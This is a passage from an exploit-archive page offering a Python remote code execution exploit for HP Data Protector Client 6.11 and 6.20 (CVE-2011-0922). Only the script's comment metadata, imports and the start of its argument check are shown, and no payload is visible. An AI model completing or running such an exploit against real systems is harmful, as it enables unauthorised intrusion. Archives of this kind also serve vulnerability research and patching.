Home / exploits HP Data Protector Client 6.11 / 6.20 Remote Code Execution
Posted on 20 June 2012
#!/usr/bin/env python # Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability # Date: 2012-12-06 # Exploit Author: Ben Turner # Vendor Homepage: www.hp.com # Version: 6.11 & 6.20 # Tested on: Windows 2003 Server SP2 en # CVE: CVE-2011-0922 # Notes: ZDI-11-056 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143 import socket import sys import binascii if len(sys.argv) != 4: print "" print "